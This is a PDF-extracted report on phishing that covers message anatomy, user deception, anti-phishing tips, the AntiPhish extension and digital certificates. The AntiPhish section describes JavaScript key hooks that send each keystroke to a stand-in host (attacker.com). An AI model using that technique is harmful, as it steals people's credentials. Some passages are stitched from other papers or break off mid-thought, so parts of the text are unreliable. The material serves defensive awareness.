-
8/3/2019 12966857-Phishing
1/23
ABSTRACT
The outcomes of phishing attacks are dramatically increasing every day. Attacks
on financial services companies have been doubling each year compared to
previous years. It is very important for companies to come up with new ways to
solve phishing problems because it can become a major loss to well known
companies. Also, it can cause consumers to lose confidence in doing business
online, which can affect many companies with an online presence. Not any type
of technology can stop phishing attacks, but there are many ways to enable
phishers from accomplishing their goals. Consumer education can increase the
awareness of the phishing threat and other online vulnerabilities. Lastly,
biometrics should become one of the major aspects and play an important role to
combat phishing because it provides different steps to authenticate users.
INTRODUCTION
Phishing is the practice where criminals send out unsolicited Commercial e-mails,
masquerading as valid authorities by using Logos and other formatting to
-
8/3/2019 12966857-Phishing
2/23
resemble authentic e-mails sent by the company that they are attempting to
impersonate.
Once the users receive such emails; the phishers attempt to lure them to web
sites where personal information such as credit card number and social security
numbers are required in an attempt to hack into the users accounts. The so-
called phishers try to steal usernames and passwords for identity and banking
theft.
Companies such as PayPal, eBay, Amazon, and most of the banks have been the
biggest target for phishing attacks.
LITERATURE REVIEW
The first phishing attempt occurred in January 1996. A hacker who was
attempting to steal accounts from unexpected AOL Members coined the term
phishing.
Comparison to Spam
The purpose of a phishing message is to acquire sensitive information about a
user. In order to do so, the message needs to deceive the intended recipient into
believing it is from a legitimate organization. As a form of deception, a phishing
message contains no useful information for the intended recipient and thus falls
-
8/3/2019 12966857-Phishing
3/23
under the category of spam. Although phishing is categorized as spam, it also
differs from spam. Amongst other things, spam tries to sell a product or service,
while a phishing message needs to look like it is from a legitimate organization.
Due to the similarity between phishing and legitimate messages, techniques that
are applied to spam messages cannot be applied naively to phishing messages.
For example, text-based classification can perform reasonably well in identifying
spam, but as a phishing message is forged to look like a message from a legitimate
organization, text-based classification applied naively to a phishing message will
have a high miss rate.
-
8/3/2019 12966857-Phishing
4/23
Anatomy of a phishing message
A raw phishing message can be split into two components: the content and the
headers. These components are commonly accepted as being the major
components of a message.
Content:
The content is the part of the message thatthe user sees and is used by phishing
message producers todeceive users. It can be subdivided into two parts.
-
8/3/2019 12966857-Phishing
5/23
y The cover is the content which is made to look like a message from the
legitimate organization, and usually informs the user of a problem with
their account. Early phishing messages could be identified based only on
their cover, due to imperfect grammar or spelling mistakes (which are
uncommon in legitimate messages). Over time, the covers used in phishing
messages have become more sophisticated, to the point where they even
warn the users about protecting their password and avoiding fraud. An
example of this can be seen in Figure below where the phishing message
tells the victim to Protect Your Account Info by making sure you never
provide your password to fraudulent websites.
-
8/3/2019 12966857-Phishing
6/23
y Thestingis the part of the content that directs the victim to take remedial
actions. It usually takes the form of a clickable URL that directs the victim to
a fake website to log into their account or enter other personal details. We
call this the sting, as this is the part of the content that inflicts pain, by
means of financial loss or other undesirable action after the victim enters
their details on the website. Typically the sting is hidden by using HTML to
display a legitimate looking address, instead of the address of the fake
website. An example of this is shown in above Figure where the address of
-
8/3/2019 12966857-Phishing
7/23
the fake website is http://www.nutristore.com.au/r.htm and the
corresponding displayed text is a legitimate looking
https://www2.paypal.com/cgi-bin/?cmd= login.
Headers
The headers are the part of the message which is primarily used by the mail
servers and the mail client todetermine where the message is going and how to
unpack the message. Most users do not see these headers, but in terms of
determining if a message is phishing or not, this part of the message can be quite
useful. Headers can be subdivided into three parts based on the entities which
add them to the message:
y Mail clients typically add headers such as To:, From:, Subject: and
some client specific headers. Examples of mail client headers are X-
MSMail-Priority, X-Mailer, and X-MimeOLE, and they can be seen in above
figure. Phishing messages may try to fake a particular header and in doing
so, give away that the message is fake. For example, if the X-Mailer header
indicates that a HTML message has been composed using MS Outlook but
the message only contains HTML (without plaintext), this is an indication
that the message is fake, as MS Outlook cannot send HTML only messages.
y Mail relays will add headers along the path of the message. These are
usually Received headers, which can be used to determine the
originating IP of the message and the path taken by the message.
-
8/3/2019 12966857-Phishing
8/23
y Spam-filters or virus-scanners will usually add headers to the message to
indicate results of the tests run over the message. These headers can then
be used by the receiving client to determine (based on a user-set
threshold) what to do with the message.
WHY PHISHING ATTACK!
Lack of Knowledge
y Lack of computer system knowledge: Many users lack the underlying
knowledge of how operating systems, applications, email and the web
work and how to distinguish among these. Phishing sites exploit this lack of
knowledge in several ways. For example, some users do not understand
the meaning or the syntax of domain names and cannot distinguish
legitimate versus fraudulent URLs (e.g., they may think www.ebay-
members-security.com belongs to www.ebay.com). Another attack
strategy forges the email header; many users do not have the skills to
distinguish forged from legitimate headers.
y Lack of knowledge of security and security indicators: Many users do not
understand security indicators. For example, many users do not know that
a closed padlock icon in the browser indicates that the page they are
-
8/3/2019 12966857-Phishing
9/23
viewing was delivered securely by SSL. Even if they understand the
meaning of that icon, users can be fooled by its placement within the body
of a web page (this confusion is not aided by the fact that competing
browsers use different icons and place them in different parts of their
display). More generally, users may not be aware that padlock icons appear
in the browser chrome (the interface constructed by the browser around
a web page, e.g., toolbars, windows, address bar, status bar) only under
specific conditions (i.e., when SSL is used), while icons in the content of the
web page can be placed there arbitrarily by designers (or by phishers) to
induce trust. Attackers can also exploit users lack of understanding of the
verification process for SSL certificates. Most users do not know how to
check SSL certificates in the browser or understand the information
presented in a certificate. In one spoofing strategy, a rogue site displays a
certificate authority's (CA) trust seal that links to a CA webpage. This
webpage provides an English language description and verification of the
legitimate sites certificate. Only the most informed and diligent users
would know to check that the URL of the originating site and the legitimate
site described by the CA match.
y Lack of knowledge of web fraud: Some users dont know that spoofing
websites is possible. Without awareness phishing is possible, some users
simply do not question website legitimacy.
y Erroneous security knowledge. Some users have misconceptions about
which website features indicate security. For example, participants
assumed that if websites contained professional-looking images,
animations, and ads, they assumed the sites were legitimate (influenced by
-
8/3/2019 12966857-Phishing
10/23
well-known trust indicators, discussed below). Similarly, dedicated login
pages from banks were less trusted than those originating from a
homepage; several participants mentioned a lack of images and links as a
reason for their distrust.
Visual Deception
Phishers use visual deception tricks to mimic legitimate text, images and
windows.
y Visually deceptive text. Users may be fooled by the syntax of a domain
name in type jacking attacks, which substitute letters that may go
unnoticed (e.g. www.paypai.com uses a lowercase i which looks similar
to the letter l, and www.paypa1.com substitutes the number 1 for the
letter l). Phishers have also taken advantage of non-printing characters
and non-ASCII Unicode characters in domain names.
y Images masking underlying text. One common technique used by phishers
is to use an image of a legitimate hyperlink. The image itself serves as a
hyperlink to a different, rogue site.
y Images mimicking windows. Phishers use images in the content of a web
page that mimic browser windows or For user convenience, some
legitimate organizations allow users to login from non-SSL pages. Although
the user data may be transmitted securely, there is no visual cue in the
browser to indicate if SSL is used for form submissions. To remedy this,
designers resort to placing a padlock icon in the page content, a tactic that
phishers also exploit or dialog windows. Because the image looks exactly
like a real window, a user can be fooled unless he tries to move or resize
the image.
-
8/3/2019 12966857-Phishing
11/23
y Windows masking underlying windows: A common phishing technique is
to place an illegitimate browser window on top of, or next to, a legitimate
window. If they have the same look and feel, users may mistakenly believe
that both windows are from the same source, regardless of variations in
address or security indicators. In the worst case, a user may not even
notice that a second window exists (browsers that allow borderless pop-up
windows aggravate the problem).
y Deceptive look and feel. If images and logos are copied perfectly,
sometimes the only cues that are available to the user are the tone of the
language, misspellings or other signs of unprofessional design. If the
phishing site closely mimics the target site, the only cue to the user might
be the type and quantity of requested personal information.
.WHAT SHOULD BE DONE TO FIGHT
PHISHING?(ANTI-
PHISHING)
Phishing needs to be followed in a managerial way within the network and its
components such as servers, PCs, operating systems, browsers and other
applications that run off a connection.
As considering, the danger of both false negative where firewall packet
inspection fails to identify a phishing site and false positive where firewall packet
inspection wrongly rejects the valid sites, it is important to minimize these risks.
-
8/3/2019 12966857-Phishing
12/23
Microsofts Anti-phishing response team analyzes sites carefully to confirm they
are fraud e-mails before adding them to the blacklist. Even then, sites that are
concerned can be reconsidered and later removed from the list.
Another way of solving this problem can be in a technical way by using a
biometric check up. Biometrics refers to technologies that analyze an individuals
physical and behavioral characteristics to automate identification or verification
of the user.
To avoid the risk of being locked in by phishers here are few tips:
Be extremely suspicious of any e-mails with urgent
requests for personal information
Do not fill out any forms in e-mail messages especially
from banks
Do not use the links that are provided in the e-mails this
can cause installing any malicious malware on your
computer. Instead contact the company over the phone
to solve any problems.
Do not give your credit card numbers or account
information unless you are using a secure Web site or
the telephone. If you are using a Web site, check the
beginning of the web address in your browsers address
-
8/3/2019 12966857-Phishing
13/23
bar. A secure site should up as https:// instead of just
http://.
y Verify the real address of a web site. Cut and paste the
following text into your browser address bar.
javascript:alert("The actual URL of this site has been verified
as: " + location. protocol + "//" + location. hostname +"/");
y Ensure that your browser and OS software is up-to-date and
that latest security patches are applied.
Possible ways ofby-passing AntiPhish with JavaScript
As long as the web page that the user is viewing is pure HTML, AntiPhish can
easily mitigate phishing attacks. This is because the attacker can only steal the
sensitive information in the page after the user performs a submit. Before this can
happen, however, AntiPhish detects that sensitive information has been typed
into a form and cancels the operation. Stopping a phishing attack in an HTML
page that has JavaScript, on the other hand, is not that easy and special care has
to be taken. JavaScript is a powerful language that is widely used in webpage for
providing functionality such as submitting forms, opening windows, intercepting
events and performing input validity checks. At the same time, however,
JavaScript gives the attacker a wide range of possibilities for by-passing a
monitoring application such as AntiPhish. Just as AntiPhish creates hooks for
intercepting user generated events such as key strokes, the attacker can also
-
8/3/2019 12966857-Phishing
14/23
create such hooks using JavaScript embedded into the HTML page. Instead of
waiting for the user to press a submit button to send the information, the
attacker could intercept the keys that are pressed and send the information
character by character to a server of her choice. Typically, this is done by
modifying the URL of an existing or hidden image to a web site that the attacker
controls (e.g., if a has been pressed, an image URL may be set to
http://attacker.com/key?a). Another possibility for the attacker could be to set a
simple timer and to capture snapshots of the information in the forms. In this
way, an important part of the information could be captured without the user
ever hitting a submit button. The easiest solution to the JavaScript problem is to
deactivate JavaScript on a page that contains forms. Unfortunately, this solution is
not feasible because, as mentioned before, a large number of Web sites use
JavaScript for validation and submission purposes. The solution we use in
AntiPhish is to deactivate JavaScript every time the focus is on an HTML text
element and to reactivateit whenever the focus is lost. Using this technique, we
ensure that the attacker is not able to create hooks, timers and intercept browser
events such as key presses while the user is typing information into a text field. At
the same time, we ensure that the legitimate JavaScript functionality on a page
(e.g., such as input validation routines) are preserved. By the time the focus is lost
from the text element and Java script is reactivated, AntiPhish has already
determined if the information that was typed into the text element is sensitive. If
the web site is un trusted, the operation can be canceled. One side-effect of our
approach is that legitimate event-based Java script functionality such as input
validation based on key presses will not function. The use of key press events for
-
8/3/2019 12966857-Phishing
15/23
input validation, however, is uncommon. Most web sites perform client-side input
validation once before a form is submitted.
Implementation details
We implemented the prototype of AntiPhish as a Mozilla browser extension (i.e.,plug-in).Mozilla browser extensions are written using the Mozilla XML User-
Interface language (XUL) and JavaScript. The Mozilla implementation of AntiPhish
has a small footprint and consists of about 900 lines of JavaScript code and 200
lines of XUL user interface code. We used Paul Teros JavaScript DES
implementation for safely storing the sensitive information.
ANALYSIS OF A PHISHING DATABASE
The Anti Phishing Working Group maintains a Phishing Archive describing
phishing attacks dating back to September 2003. We performed a cognitive
walkthrough on the approximately 200 sample attacks within this archive. (A
cognitive walkthrough evaluates the steps required to perform a task and
attempts to uncover mismatches between how users think about a task and how
the user interface designer thinks about the task.) Our goal was to gather
information about which strategies are used by attackers and to formulate
hypotheses about how lay users would respond to these strategies. Below we list
the strategies, organized along three dimensions: lack of knowledge, visual
deception, and lack of attention. To aid readers who are unfamiliar with the topic,
Security Terms and Definitions
Certificate (digital certificate, public key certificate):
Uses a digital signature to bind together a public key with an identity. If the browser
encounters a certificate that has not been signed by a trusted certificate
authority, it
issues a warning to the user. Some organizations create and sign their own selfsigned
Certificates. If a browserencounters a self-signed certificate, it issues a warning and
allows the user to decide whether to accept the certificate.
Certificate Authority (CA):
-
8/3/2019 12966857-Phishing
16/23
An entity that issuescertificatesand attests that a public key belongs to a particular
identity. A list of trusted CAs isstored in the browser. A certificate may be issued to a
fraudulent website by a CA without a rigorous verification process.
HTTPS:
Web browsers use "HTTPS", rather than "HTTP" as a prefix to theURL to indicate that
HTTP issent overSSL/TLS.
Secure Sockets Layer (SSL) and Transport LayerSecurity
(TLS):
Cryptographic protocols used to provide authentication and secure communications
over the Internet. SSL/TLS authenticates a server by verifying that theserver holds a
certificate that has been digitallysigned by a trusted certificateauthority. SSL/TLS also
allows the client and server to agree on an encryption algorithm for securing
communications.
CryptographyCryptography is a method of storing and transmitting data in a form that only
those it is intended for can read and process. It is a science of protecting
information by encoding it into an unreadable format. Cryptography is an
effective way of protecting sensitive information as it is stored on media or
transmitted through network communication paths.
Although the ultimate goal of cryptography, and the mechanisms that make it up,
is to hide information from unauthorized individuals, most algorithms can be
broken and the information can be revealed if the attacker has enough time,
desire, and resources. So a more realistic goal of cryptography is to make
obtaining the information too work-intensive to be worth it to the attacker.
Digital Certificates
Digital Certificates are part of a technology called Public Key Infrastructure or
PKI. Digital certificates have been described as virtual ID cards. This is a useful
analogy. There are many ways that digital certificates and ID cards really are the
-
8/3/2019 12966857-Phishing
17/23
same. Both ID cards and client digital certificates contain information about user,
such as user name and information about the organization that issued the
certificate or card to user.
Creating digital certificates a unique cryptographic key pair is generated. One of
these keys is referred to as a public key and the other as a private key. The
certification authoritygenerally on your campuscreates a digital certificate by
combining information about user and the issuing organization with the public
key and digitally signing the whole thing. This is very much like an organizations
ID office filling out an ID card for user and then signing it to make it official.
The process defines how a certificate authority establishes that a person or
institution is who they say they are. Certification may require recipients to appear
in person and to present pictures, birth certificates, or social security numbers.Certificates that are issued after rigorous authentication will be more trustworthy
than certificates requiring little or noiauthentication.
The contents of a digital certificate are prescribed by the X.509 standard,
developed by the International Standards Organization (ISO) and adopted by the
American National Standards Institute (ANSI) and the Internet Engineering Task
Force (IETF). The latest version is now X509 v3. The principal elements of a digital
certificate are as follows:
Version number of the certificate format Serial number of the certificate
Signature algorithm identifier
Issuer of digital certificate: a certificate authority with URL
Validity period
Unique identification of certificate holder
Public key information
The Parties to a Digital CertificateIn principle there are three different interests associated with a digital certificate:
The Requesting PartyThe party who needs the certificate and will offer it for use by others they will
generally provide some or all of the information it contains.
The Issuing Party
The party that digitally signs the certificate after creating the information in the
certificate orchecking its correctness.
The Verifying Party (or Parties)
-
8/3/2019 12966857-Phishing
18/23
Parties that validate the signature on the certificate and then rely on its contents for
some purpose.Type of Certificate Requesting Party Issuing Party Verifying PartyIdentity The person
concernedThe appropriategovernment agency
Anyone undertakingan
identity checkAccreditation A qualified memberof a profession
The professionalbody
A user of theservicesoffered by themember
Authorization A customer wishing toaccess a resource
The resource owner The resource owner
Public key CertificateThe combination of standards, protocols, and software that support digital
certificates is called a public key infrastructure,or PKI. The software that supports
this infrastructure generates sets of public-private key pairs. Public-private key
pairs are codes that are related to one another through a complex mathematical
algorithm. The key pairs can reside on ones computer or on hardware devices
such as smart cards or floppy disks. Individuals or organizations must ensure the
security of their private keys. However, the public keys that correspond to theirprivate keys can be posted on Web sites or sent across the network. Issuers of
digital certificates often maintain online repositories of public keys. These
repositories make it possible to authenticate owners of digital certificates in real
time.
For example, publishers, as service providers, will want to authenticate the digital
certificate of a faculty member or student in real time. This is possible by verifying
the digital signature using the public y in the repository.
-
8/3/2019 12966857-Phishing
19/23
Certificate AuthoritiesDigital certificates are one part of a set of components that make up a public key
infrastructure (PKI). A PKI includes organizations called certification authorities
(CAs) that issue, manage, and revoke digital certificates; organizations called
relyingparties who use the certificates as indicators of authentication, and clients
who request, manage, and use certificates. A CA might create a separateregistration authority(RA) to handle the task of identifying individuals who apply
for certificates. Examples of certification authorities include VeriSign, a wellknown
commercial provider, and the CREN Certificate Authority that is
available for higher education institutions.
Types of Certificates
There are different types ofcertificates, each with different functions and this can
be confusing. It helps to differentiate between at least four types ofcertificates.
You can see samples of some of these different types of certificates in your
browser.
Root or authority certificates
These are certificates that create the base (or root) of a certification authority
hierarchy, such as Thawte or CREN. These certificates are not signed by another
CAthey are self signedby the CA that created them. When a certificate is self-
-
8/3/2019 12966857-Phishing
20/23
signed, it means that the name in the Issuer field is the same as the name in the
Subject Field.
Institutional authority certificates
These certificates are also called campus certificates. These certificates are signed
by a third party verifying the authenticity of a campus certification authority.
Campuses then use their authority to issue client certificates for faculty, staff,
and students.
Client certificates
These are also known as end-entity certificates, identity certificates, or personal
certificates. The Issuer is typically the campus CA.
Web server certificates
These certificates are used to secure communications to and from Web servers, for
example when you buy something on the Web. They are called server-side
certificates. The Subject name in a servercertificate is the DNS name of the server.
The CREN Digital Certificate ServicesCREN currently offers an expanded set ofcertificate authority services to higher
education institutions.
CREN-signed campus certificates for institutions
These CREN-signed certificates are for institutions issuing certificates for their
campus communityin the range of 10 or more Web servercertificates and for
more than 500-1000 client certificates.
CREN Web server certificatesThese certificates are forcampuses to use for securing Web servers, supporting a
range ofcampus Web applications.
Client certificates
CREN has an internal CREN.NET service equivalent to a campus certificate-
issuing application. A registration contact at a campus validates/approves
individuals and CREN issues the certificates.
With these three levels of service including the free test certificates CREN
can
helpcampuses get started usi
ng digital
certifi
cates at a level mat
chi
ng theirparticularcampus needs.
-
8/3/2019 12966857-Phishing
21/23
RECOMMENDATION
It is very important to reduce the risk of phishing in todays business because
hackers need to stay out of companies databases. Todays education is not
enough since phishes are getting better each day and coming with newer trends
to catch innocent customers.
The real problem of phishing is because the login systems are very weak and thusthey need to be tighter when it comes to users authentication. The companies
could increase their cryptographic system protection by using more IPSec VPNs
and digital certificates. The use of IPSec VPNs, customers will need to establish
digital certificates from a certificate authority as well as the merchant. Recently,
while doing this research we came through an article from PayPal where they are
convincing email providers to block messages that lack digital signatures.
The reason for this is that PayPal is known as one of the most highly spoofed
brands that fraudsters uses today .This is a very good idea and a good way to
keep hackers out of PayPal databases. As a matter of fact, not only PayPal but also
every company that conducts business should come up with a similar strategy like
-
8/3/2019 12966857-Phishing
22/23
this. Using strategies similar to this will help customers to gain confidence in
doing business and dealing with money issues. In addition, well-known companies
should increase user awareness by education, training and working with FBI to
track down phishers.
CONCLUSION
In short, the outcomes of phishing attacks are dramatically increasing every day.
Attacks on financial services companies have been doubling each year compared
to previous years. It is of crucial importance for companies to come up with new
ways to solve phishing problems because it can become a major loss to well-known companies.
Also, it can cause consumers to lose confidence in doing business online, which
can affect many companies with an online presence. Not any type of technology
Can stop phishing attacks, but there are many ways to enable Phishes from
accomplishing their goals.
Consumer education can increase the awareness of the phishing threat and other
online vulnerabilities. Lastly, biometrics should become one of the major aspects
and play an important role to combat phishing because it provides different steps
to authenticate users.
REFERENCES
[1] Cannon, J.C. Privacy. Pearson Education, 2005.
[2] Hilley, Sarah. Internet war: picking on the finance
Sector-survey. Computer Fraud & Security, October
2006.
[3] Bellowin, Steven. Spamming, Phishing,
Authentication and Privacy. Inside Risks,December
-
8/3/2019 12966857-Phishing
23/23
2004 Vol.47, No.12. 144.
[4] Mulrean, Jennifer. Phishing scams: How to avoid
Getting hooked. DollarWise.
[5] Hunter, Philip. Microsoft declares war on phishers.
Computer Fraud & SecurityMay 2006: (15-16).
[6] Google. http://www.google.com
[7] Anti-Phishing Working Group. Phishing Activity
Trends Report November 2005
[8] Anti-Phishing Working Group Phishing Archive.
http://anti-phishing.org/phishing_archive.htm
[9] Ba, S. & P. Pavlov. Evidence of the Effect of Trust
Building Technology in Electronic Markets: Price
Premiums and Buyer Behavior.
i
